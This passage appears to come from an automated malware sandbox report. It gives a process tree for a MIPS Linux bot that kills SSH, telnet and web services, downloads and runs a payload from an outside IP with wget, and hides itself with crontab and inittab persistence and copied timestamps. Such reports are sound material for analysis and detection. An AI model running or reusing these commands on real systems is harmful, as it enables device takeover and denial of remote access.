            • systemctl (PID: 6965, Parent: 5615, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-rfkill.socket
            • service New Fork (PID: 7000, Parent: 5615)
            • systemctl (PID: 7000, Parent: 5615, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-udevd-control.socket
            • service New Fork (PID: 7018, Parent: 5615)
            • systemctl (PID: 7018, Parent: 5615, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-udevd-kernel.socket
            • service New Fork (PID: 7050, Parent: 5615)
            • systemctl (PID: 7050, Parent: 5615, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show uuidd.socket
          • systemctl (PID: 5615, Parent: 3310, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl stop httpd.service
        • irq0 New Fork (PID: 5616, Parent: 5526)
        • sh (PID: 5616, Parent: 5526, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 mini_httpd > /dev/null 2>&1 &"
          • sh New Fork (PID: 5639, Parent: 5616)
          • killall (PID: 5639, Parent: 3310, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 mini_httpd
        • irq0 New Fork (PID: 5641, Parent: 5526)
        • sh (PID: 5641, Parent: 5526, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 minihttpd > /dev/null 2>&1 &"
          • sh New Fork (PID: 5682, Parent: 5641)
          • killall (PID: 5682, Parent: 5641, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 minihttpd
        • irq0 New Fork (PID: 5686, Parent: 5526)
        • sh (PID: 5686, Parent: 5526, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "kill -9 `cat /var/run/thttpd.pid` > /dev/null 2>&1 &"
          • sh New Fork (PID: 5712, Parent: 5686)
            • sh New Fork (PID: 5716, Parent: 5712)
            • cat (PID: 5716, Parent: 5712, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /var/run/thttpd.pid
        • irq0 New Fork (PID: 5717, Parent: 5526)
        • sh (PID: 5717, Parent: 5526, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "nvram set httpd_enable=0 > /dev/null 2>&1"
        • irq0 New Fork (PID: 5741, Parent: 5526)
        • sh (PID: 5741, Parent: 5526, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "nvram set http_enable=0 > /dev/null 2>&1"
        • irq0 New Fork (PID: 5751, Parent: 5526)
        • sh (PID: 5751, Parent: 5526, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 httpd > /dev/null 2>&1 &"
          • sh New Fork (PID: 5776, Parent: 5751)
          • killall (PID: 5776, Parent: 5751, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 httpd
        • irq0 New Fork (PID: 5780, Parent: 5526)
        • sh (PID: 5780, Parent: 5526, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "service telnetd stop > /dev/null 2>&1 &"
          • sh New Fork (PID: 5798, Parent: 5780)
          • service (PID: 5798, Parent: 3310, MD5: 81c4fe604ec67916db7b223725e5a9c6) Arguments: /bin/sh /usr/sbin/service telnetd stop
            • service New Fork (PID: 5802, Parent: 5798)
            • basename (PID: 5802, Parent: 5798, MD5: fd7bba8b11b99ec7559f30226c79a729) Arguments: basename /usr/sbin/service
            • service New Fork (PID: 5812, Parent: 5798)
            • basename (PID: 5812, Parent: 5798, MD5: fd7bba8b11b99ec7559f30226c79a729) Arguments: basename /usr/sbin/service
            • service New Fork (PID: 5881, Parent: 5798)
            • systemctl (PID: 5881, Parent: 5798, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl --quiet is-active multi-user.target
            • service New Fork (PID: 6016, Parent: 5798)
              • service New Fork (PID: 6018, Parent: 6016)
              • systemctl (PID: 6018, Parent: 6016, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl list-unit-files --full --type=socket
              • service New Fork (PID: 6019, Parent: 6016)
              • sed (PID: 6019, Parent: 6016, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
            • service New Fork (PID: 6172, Parent: 5798)
            • systemctl (PID: 6172, Parent: 5798, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show acpid.socket
            • service New Fork (PID: 6324, Parent: 5798)
            • systemctl (PID: 6324, Parent: 5798, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show apport-forward.socket
            • service New Fork (PID: 6382, Parent: 5798)
            • systemctl (PID: 6382, Parent: 5798, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show avahi-daemon.socket
            • service New Fork (PID: 6423, Parent: 5798)
            • systemctl (PID: 6423, Parent: 5798, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show cups.socket
            • service New Fork (PID: 6489, Parent: 5798)
            • systemctl (PID: 6489, Parent: 5798, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show dbus.socket
            • service New Fork (PID: 6550, Parent: 5798)
            • systemctl (PID: 6550, Parent: 5798, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show dm-event.socket
            • service New Fork (PID: 6606, Parent: 5798)
            • systemctl (PID: 6606, Parent: 5798, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show lvm2-lvmetad.socket
            • service New Fork (PID: 6647, Parent: 5798)
            • systemctl (PID: 6647, Parent: 5798, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show lvm2-lvmpolld.socket
            • service New Fork (PID: 6674, Parent: 5798)
            • systemctl (PID: 6674, Parent: 5798, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show lxd.socket
            • service New Fork (PID: 6694, Parent: 5798)
            • systemctl (PID: 6694, Parent: 5798, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show saned.socket
            • service New Fork (PID: 6727, Parent: 5798)
            • systemctl (PID: 6727, Parent: 5798, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show snapd.socket
            • service New Fork (PID: 6755, Parent: 5798)
            • systemctl (PID: 6755, Parent: 5798, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show ssh.socket
            • service New Fork (PID: 6782, Parent: 5798)
            • systemctl (PID: 6782, Parent: 5798, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show syslog.socket
            • service New Fork (PID: 6791, Parent: 5798)
            • systemctl (PID: 6791, Parent: 5798, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-bus-proxyd.socket
            • service New Fork (PID: 6820, Parent: 5798)
            • systemctl (PID: 6820, Parent: 5798, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-fsckd.socket
            • service New Fork (PID: 6849, Parent: 5798)
            • systemctl (PID: 6849, Parent: 5798, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-initctl.socket
            • service New Fork (PID: 6875, Parent: 5798)
            • systemctl (PID: 6875, Parent: 5798, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-journald-audit.socket
            • service New Fork (PID: 6900, Parent: 5798)
            • systemctl (PID: 6900, Parent: 5798, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-journald-dev-log.socket
            • service New Fork (PID: 6935, Parent: 5798)
            • systemctl (PID: 6935, Parent: 5798, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-journald.socket
            • service New Fork (PID: 6954, Parent: 5798)
            • systemctl (PID: 6954, Parent: 5798, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-networkd.socket
            • service New Fork (PID: 6990, Parent: 5798)
            • systemctl (PID: 6990, Parent: 5798, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-rfkill.socket
            • service New Fork (PID: 7017, Parent: 5798)
            • systemctl (PID: 7017, Parent: 5798, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-udevd-control.socket
            • service New Fork (PID: 7044, Parent: 5798)
            • systemctl (PID: 7044, Parent: 5798, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-udevd-kernel.socket
            • service New Fork (PID: 7071, Parent: 5798)
            • systemctl (PID: 7071, Parent: 5798, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show uuidd.socket
          • systemctl (PID: 5798, Parent: 3310, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl stop telnetd.service
        • irq0 New Fork (PID: 5800, Parent: 5526)
        • sh (PID: 5800, Parent: 5526, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "service sshd stop > /dev/null 2>&1 &"
          • sh New Fork (PID: 5810, Parent: 5800)
          • service (PID: 5810, Parent: 5800, MD5: 81c4fe604ec67916db7b223725e5a9c6) Arguments: /bin/sh /usr/sbin/service sshd stop
            • service New Fork (PID: 5820, Parent: 5810)
            • basename (PID: 5820, Parent: 5810, MD5: fd7bba8b11b99ec7559f30226c79a729) Arguments: basename /usr/sbin/service
            • service New Fork (PID: 5870, Parent: 5810)
            • basename (PID: 5870, Parent: 5810, MD5: fd7bba8b11b99ec7559f30226c79a729) Arguments: basename /usr/sbin/service
            • service New Fork (PID: 5920, Parent: 5810)
            • systemctl (PID: 5920, Parent: 5810, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl --quiet is-active multi-user.target
            • service New Fork (PID: 6017, Parent: 5810)
              • service New Fork (PID: 6020, Parent: 6017)
              • systemctl (PID: 6020, Parent: 6017, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl list-unit-files --full --type=socket
              • service New Fork (PID: 6021, Parent: 6017)
              • sed (PID: 6021, Parent: 6017, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
            • service New Fork (PID: 6322, Parent: 5810)
            • systemctl (PID: 6322, Parent: 5810, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show acpid.socket
            • service New Fork (PID: 6383, Parent: 5810)
            • systemctl (PID: 6383, Parent: 5810, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show apport-forward.socket
            • service New Fork (PID: 6424, Parent: 5810)
            • systemctl (PID: 6424, Parent: 5810, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show avahi-daemon.socket
            • service New Fork (PID: 6484, Parent: 5810)
            • systemctl (PID: 6484, Parent: 5810, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show cups.socket
            • service New Fork (PID: 6548, Parent: 5810)
            • systemctl (PID: 6548, Parent: 5810, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show dbus.socket
            • service New Fork (PID: 6603, Parent: 5810)
            • systemctl (PID: 6603, Parent: 5810, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show dm-event.socket
            • service New Fork (PID: 6650, Parent: 5810)
            • systemctl (PID: 6650, Parent: 5810, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show lvm2-lvmetad.socket
            • service New Fork (PID: 6676, Parent: 5810)
            • systemctl (PID: 6676, Parent: 5810, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show lvm2-lvmpolld.socket
            • service New Fork (PID: 6715, Parent: 5810)
            • systemctl (PID: 6715, Parent: 5810, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show lxd.socket
            • service New Fork (PID: 6738, Parent: 5810)
            • systemctl (PID: 6738, Parent: 5810, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show saned.socket
            • service New Fork (PID: 6765, Parent: 5810)
            • systemctl (PID: 6765, Parent: 5810, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show snapd.socket
            • service New Fork (PID: 6784, Parent: 5810)
            • systemctl (PID: 6784, Parent: 5810, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show ssh.socket
            • service New Fork (PID: 6819, Parent: 5810)
            • systemctl (PID: 6819, Parent: 5810, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show syslog.socket
            • service New Fork (PID: 6846, Parent: 5810)
            • systemctl (PID: 6846, Parent: 5810, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-bus-proxyd.socket
            • service New Fork (PID: 6874, Parent: 5810)
            • systemctl (PID: 6874, Parent: 5810, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-fsckd.socket
            • service New Fork (PID: 6901, Parent: 5810)
            • systemctl (PID: 6901, Parent: 5810, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-initctl.socket
            • service New Fork (PID: 6937, Parent: 5810)
            • systemctl (PID: 6937, Parent: 5810, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-journald-audit.socket
            • service New Fork (PID: 6955, Parent: 5810)
            • systemctl (PID: 6955, Parent: 5810, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-journald-dev-log.socket
            • service New Fork (PID: 6989, Parent: 5810)
            • systemctl (PID: 6989, Parent: 5810, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-journald.socket
            • service New Fork (PID: 7016, Parent: 5810)
            • systemctl (PID: 7016, Parent: 5810, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-networkd.socket
            • service New Fork (PID: 7043, Parent: 5810)
            • systemctl (PID: 7043, Parent: 5810, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-rfkill.socket
            • service New Fork (PID: 7070, Parent: 5810)
            • systemctl (PID: 7070, Parent: 5810, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-udevd-control.socket
            • service New Fork (PID: 7082, Parent: 5810)
            • systemctl (PID: 7082, Parent: 5810, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-udevd-kernel.socket
            • service New Fork (PID: 7153, Parent: 5810)
            • systemctl (PID: 7153, Parent: 5810, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show uuidd.socket
          • systemctl (PID: 5810, Parent: 3310, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl stop sshd.service
        • irq0 New Fork (PID: 5814, Parent: 5526)
        • sh (PID: 5814, Parent: 5526, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 telnetd > /dev/null 2>&1 &"
          • sh New Fork (PID: 5872, Parent: 5814)
          • killall (PID: 5872, Parent: 5814, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 telnetd
        • irq0 New Fork (PID: 5880, Parent: 5526)
        • sh (PID: 5880, Parent: 5526, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 utelnetd > /dev/null 2>&1 &"
          • sh New Fork (PID: 5923, Parent: 5880)
          • killall (PID: 5923, Parent: 5880, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 utelnetd
        • irq0 New Fork (PID: 5927, Parent: 5526)
        • sh (PID: 5927, Parent: 5526, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 dropbear > /dev/null 2>&1 &"
          • sh New Fork (PID: 5966, Parent: 5927)
          • killall (PID: 5966, Parent: 5927, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 dropbear
        • irq0 New Fork (PID: 5968, Parent: 5526)
        • sh (PID: 5968, Parent: 5526, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 sshd > /dev/null 2>&1 &"
          • sh New Fork (PID: 5985, Parent: 5968)
          • killall (PID: 5985, Parent: 5968, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 sshd
        • irq0 New Fork (PID: 5987, Parent: 5526)
        • sh (PID: 5987, Parent: 5526, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 lighttpd > /dev/null 2>&1 &"
          • sh New Fork (PID: 5991, Parent: 5987)
          • killall (PID: 5991, Parent: 5987, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 lighttpd
        • irq0 New Fork (PID: 8441, Parent: 5526)
          • irq0 New Fork (PID: 8443, Parent: 8441)
          • sh (PID: 8443, Parent: 8441, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;( kill -9 `cat /var/run/dropbear.pid` `cat /var/run/sshd.pid` ; killall -9 tty0 tty1 tty4 tty5 tty6 sshd dropbear ; rm -rf /var/run/tt* /tmp/tt* )>/dev/null 2>&1 & "
            • sh New Fork (PID: 8445, Parent: 8443)
              • sh New Fork (PID: 8446, Parent: 8445)
              • cat (PID: 8446, Parent: 8445, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /var/run/dropbear.pid
              • sh New Fork (PID: 8447, Parent: 8445)
              • cat (PID: 8447, Parent: 8445, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /var/run/sshd.pid
              • sh New Fork (PID: 8472, Parent: 8445)
              • killall (PID: 8472, Parent: 8445, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 tty0 tty1 tty4 tty5 tty6 sshd dropbear
            • rm (PID: 8445, Parent: 3310, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -rf /var/run/tt* /tmp/tt*
        • irq0 New Fork (PID: 8489, Parent: 5526)
    • sh New Fork (PID: 5286, Parent: 4579)
    • wget (PID: 5286, Parent: 4579, MD5: 458ce58ac4b1aac3eafc287fa46bf92d) Arguments: wget http://71.127.148.69/.x/irq1 -O irq1
    • sh New Fork (PID: 5856, Parent: 4579)
    • chmod (PID: 5856, Parent: 4579, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod +x irq1
    • sh New Fork (PID: 5864, Parent: 4579)
    • chmod (PID: 5864, Parent: 4579, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod 700 irq1
    • sh New Fork (PID: 5875, Parent: 4579)
    • irq1 (PID: 5875, Parent: 4579, MD5: unknown) Arguments: /usr/bin/qemu-mips ./irq1
      • irq1 New Fork (PID: 6071, Parent: 5875)
      • sh (PID: 6071, Parent: 5875, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "chmod 700 /tmp/irq1 > /dev/null 2>&1 &"
        • sh New Fork (PID: 6073, Parent: 6071)
        • chmod (PID: 6073, Parent: 6071, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod 700 /tmp/irq1
      • irq1 New Fork (PID: 6075, Parent: 5875)
      • sh (PID: 6075, Parent: 5875, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "touch -acmr /bin/ls /tmp/irq1"
        • sh New Fork (PID: 6100, Parent: 6075)
        • touch (PID: 6100, Parent: 6075, MD5: 1f168f69957c0fffbdd62556ad215f3c) Arguments: touch -acmr /bin/ls /tmp/irq1
      • irq1 New Fork (PID: 6105, Parent: 5875)
      • sh (PID: 6105, Parent: 5875, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "(crontab -l | grep -v \"/tmp/irq1\" | grep -v \"no cron\" | grep -v \"lesshts/run.sh\" > /var/run/.x00740882966) > /dev/null 2>&1"
        • sh New Fork (PID: 6111, Parent: 6105)
          • sh New Fork (PID: 6119, Parent: 6111)
          • crontab (PID: 6119, Parent: 6111, MD5: ff68fd30f0037fd7e9c1fdf5a035f739) Arguments: crontab -l
          • sh New Fork (PID: 6120, Parent: 6111)
          • grep (PID: 6120, Parent: 6111, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -v /tmp/irq1
          • sh New Fork (PID: 6121, Parent: 6111)
          • grep (PID: 6121, Parent: 6111, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -v "no cron"
          • sh New Fork (PID: 6122, Parent: 6111)
          • grep (PID: 6122, Parent: 6111, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -v lesshts/run.sh
      • irq1 New Fork (PID: 6156, Parent: 5875)
      • sh (PID: 6156, Parent: 5875, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "echo \"* * * * * /tmp/irq1 > /dev/null 2>&1 &\" >> /var/run/.x00740882966"
      • irq1 New Fork (PID: 6161, Parent: 5875)
      • sh (PID: 6161, Parent: 5875, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "crontab /var/run/.x00740882966"
        • sh New Fork (PID: 6173, Parent: 6161)
        • crontab (PID: 6173, Parent: 6161, MD5: ff68fd30f0037fd7e9c1fdf5a035f739) Arguments: crontab /var/run/.x00740882966
      • irq1 New Fork (PID: 6197, Parent: 5875)
      • sh (PID: 6197, Parent: 5875, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "rm -rf /var/run/.x00740882966"
        • sh New Fork (PID: 6237, Parent: 6197)
        • rm (PID: 6237, Parent: 6197, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -rf /var/run/.x00740882966
      • irq1 New Fork (PID: 6251, Parent: 5875)
      • sh (PID: 6251, Parent: 5875, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "cat /etc/inittab | grep -v \"/tmp/irq1\" > /etc/inittab2"
        • sh New Fork (PID: 6259, Parent: 6251)
        • cat (PID: 6259, Parent: 6251, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /etc/inittab
        • sh New Fork (PID: 6260, Parent: 6251)
        • grep (PID: 6260, Parent: 6251, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -v /tmp/irq1
      • irq1 New Fork (PID: 6292, Parent: 5875)
      • sh (PID: 6292, Parent: 5875, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "echo \"0:2345:respawn:/tmp/irq1\" >> /etc/inittab2"
      • irq1 New Fork (PID: 6330, Parent: 5875)
      • sh (PID: 6330, Parent: 5875, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "cat /etc/inittab2 > /etc/inittab"
        • sh New Fork (PID: 6374, Parent: 6330)
        • cat (PID: 6374, Parent: 6330, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /etc/inittab2
      • irq1 New Fork (PID: 6385, Parent: 5875)
      • sh (PID: 6385, Parent: 5875, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "rm -rf /etc/inittab2"
        • sh New Fork (PID: 6399, Parent: 6385)
        • rm (PID: 6399, Parent: 6385, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -rf /etc/inittab2
      • irq1 New Fork (PID: 6414, Parent: 5875)
      • sh (PID: 6414, Parent: 5875, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "touch -acmr /bin/ls /etc/inittab"
        • sh New Fork (PID: 6439, Parent: 6414)
        • touch (PID: 6439, Parent: 6414, MD5: 1f168f69957c0fffbdd62556ad215f3c) Arguments: touch -acmr /bin/ls /etc/inittab
      • irq1 New Fork (PID: 6469, Parent: 5875)
        • irq1 New Fork (PID: 6488, Parent: 6469)
        • sh (PID: 6488, Parent: 6469, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "/bin/uname -n"
          • sh New Fork (PID: 6544, Parent: 6488)
          • uname (PID: 6544, Parent: 6488, MD5: 1078d9dca4e90919f7b2433cae105008) Arguments: /bin/uname -n
        • irq1 New Fork (PID: 6547, Parent: 6469)
        • sh (PID: 6547, Parent: 6469, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "/bin/uname -n"
          • sh New Fork (PID: 6573, Parent: 6547)
          • uname (PID: 6573, Parent: 6547, MD5: 1078d9dca4e90919f7b2433cae105008) Arguments: /bin/uname -n
        • irq1 New Fork (PID: 6601, Parent: 6469)
        • sh (PID: 6601, Parent: 6469, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "/bin/uname -n"
          • sh New Fork (PID: 6605, Parent: 6601)
          • uname (PID: 6605, Parent: 6601, MD5: 1078d9dca4e90919f7b2433cae105008) Arguments: /bin/uname -n
        • irq1 New Fork (PID: 7191, Parent: 6469)
        • sh (PID: 7191, Parent: 6469, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "kill -9 `cat /var/run/httpd.pid` > /dev/null 2>&1 &"
          • sh New Fork (PID: 7194, Parent: 7191)
            • sh New Fork (PID: 7199, Parent: 7194)
            • cat (PID: 7199, Parent: 7194, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /var/run/httpd.pid
        • irq1 New Fork (PID: 7195, Parent: 6469)
        • sh (PID: 7195, Parent: 6469, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "service httpd stop > /dev/null 2>&1 &"
          • sh New Fork (PID: 7205, Parent: 7195)
          • service (PID: 7205, Parent: 3310, MD5: 81c4fe604ec67916db7b223725e5a9c6) Arguments: /bin/sh /usr/sbin/service httpd stop
            • service New Fork (PID: 7209, Parent: 7205)
            • basename (PID: 7209, Parent: 7205, MD5: fd7bba8b11b99ec7559f30226c79a729) Arguments: basename /usr/sbin/service
            • service New Fork (PID: 7227, Parent: 7205)
            • basename (PID: 7227, Parent: 7205, MD5: fd7bba8b11b99ec7559f30226c79a729) Arguments: basename /usr/sbin/service
            • service New Fork (PID: 7235, Parent: 7205)
            • systemctl (PID: 7235, Parent: 7205, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl --quiet is-active multi-user.target
            • service New Fork (PID: 7298, Parent: 7205)
              • service New Fork (PID: 7303, Parent: 7298)
              • systemctl (PID: 7303, Parent: 7298, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl list-unit-files --full --type=socket
              • service New Fork (PID: 7305, Parent: 7298)
              • sed (PID: 7305, Parent: 7298, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
            • service New Fork (PID: 7560, Parent: 7205)
            • systemctl (PID: 7560, Parent: 7205, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show acpid.socket
            • service New Fork (PID: 7607, Parent: 7205)
            • systemctl (PID: 7607, Parent: 7205, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show apport-forward.socket
            • service New Fork (PID: 7627, Parent: 7205)
            • systemctl (PID: 7627, Parent: 7205, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show avahi-daemon.socket
            • service New Fork (PID: 7662, Parent: 7205)
            • systemctl (PID: 7662, Parent: 7205, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show cups.socket
            • service New Fork (PID: 7673, Parent: 7205)
            • systemctl (PID: 7673, Parent: 7205, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show dbus.socket
            • service New Fork (PID: 7707, Parent: 7205)
            • systemctl (PID: 7707, Parent: 7205, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show dm-event.socket
            • service New Fork (PID: 7743, Parent: 7205)
            • systemctl (PID: 7743, Parent: 7205, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show lvm2-lvmetad.socket
            • service New Fork (PID: 7754, Parent: 7205)
            • systemctl (PID: 7754, Parent: 7205, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show lvm2-lvmpolld.socket
            • service New Fork (PID: 7789, Parent: 7205)
            • systemctl (PID: 7789, Parent: 7205, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show lxd.socket
            • service New Fork (PID: 7823, Parent: 7205)
            • systemctl (PID: 7823, Parent: 7205, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show saned.socket
            • service New Fork (PID: 7836, Parent: 7205)
            • systemctl (PID: 7836, Parent: 7205, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show snapd.socket
            • service New Fork (PID: 7876, Parent: 7205)
            • systemctl (PID: 7876, Parent: 7205, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show ssh.socket
            • service New Fork (PID: 7904, Parent: 7205)
            • systemctl (PID: 7904, Parent: 7205, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show syslog.socket
            • service New Fork (PID: 7931, Parent: 7205)
            • systemctl (PID: 7931, Parent: 7205, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-bus-proxyd.socket
            • service New Fork (PID: 7958, Parent: 7205)
            • systemctl (PID: 7958, Parent: 7205, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-fsckd.socket
            • service New Fork (PID: 7985, Parent: 7205)
